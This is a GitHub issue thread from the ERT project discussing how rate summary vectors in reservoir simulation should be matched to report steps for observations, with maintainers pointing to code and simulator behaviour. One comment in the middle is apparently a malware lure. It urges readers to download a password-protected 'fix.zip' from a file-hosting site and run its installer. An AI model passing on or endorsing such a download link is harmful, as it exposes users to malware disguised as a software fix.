### ISSUE TITLE
Investigate use of rate summary vectors in update algorithms

### ISSUE THREAD

**Issue by sondreso** [equinor/ert#8572]
### What happened? (You can include a screenshot if it helps explain)

Rate vectors are special in reservoir simulators, in that every data-point is valid backwards in time (but not including) the current time-step. See: https://equinor.github.io/fmu-ensemble/usage.html#rate-handling-in-eclipse-summary-vectors

See also: https://github.com/equinor/ert/issues/8574

### What did you expect to happen?

If observations are specified for a rate vector, we need to use the value from the next report step (not the current). 

### steps to reproduce
TBD

See internal discussions [here](https://equinor.slack.com/archives/CDPJULWR4/p1724629901363639)

### Environment where bug has been observed

- [X] python 3.8
- [ ] python 3.9
- [ ] python 3.10
- [ ] python 3.11
- [ ] python 3.12
- [ ] macosx
- [X] rhel7
- [ ] rhel8
- [ ] local queue
- [ ] lsf queue
- [ ] slurm queue
- [ ] openPBS queue
- [ ] used flag `--enable-scheduler`

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eivindjahren** [comment]
In https://github.com/equinor/ert/blob/26d537642ccd35e1711e757ddd4b48303cc66ef0/src/ert/config/_read_summary.py#L524, the last "PARAMS" entry before a "SEQHDR" entry is chosen (we use the last values before the next report step). This is a reimplementation of how it is done in resdata here: https://github.com/equinor/resdata/blob/ecded93430e80df984b7805977a78b4e29170f25/lib/resdata/rd_sum_file_data.cpp#L414 . However, it is possible to fetch more granular information by looking at ministeps.

**Comment by sondreso** [comment]
When a "well modification" is specified, such as those introduced by `WCONHIST`/`WCONINJH`, it is only applied in the next time step and not on the date specified. This is a consequence of how the reservoir simulators we use work.

Hence, if an observation is placed on the time step of the modification, the correct behavior is to use the value from before the modification.
